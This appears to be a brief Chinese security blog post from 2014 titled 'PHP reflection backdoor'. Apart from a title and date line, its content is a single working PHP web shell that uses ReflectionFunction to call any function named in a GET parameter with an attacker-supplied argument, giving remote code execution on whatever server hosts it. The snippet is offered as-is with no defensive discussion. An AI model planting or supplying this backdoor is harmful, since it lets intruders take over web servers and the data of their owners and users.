PHP反射后门 Nov 07,2014 in 安全研究,Web lang 繁 read (3683) <?php $func = new ReflectionFunction($_GET[m]); echo $func->invokeArgs(array($_GET[c])); ?>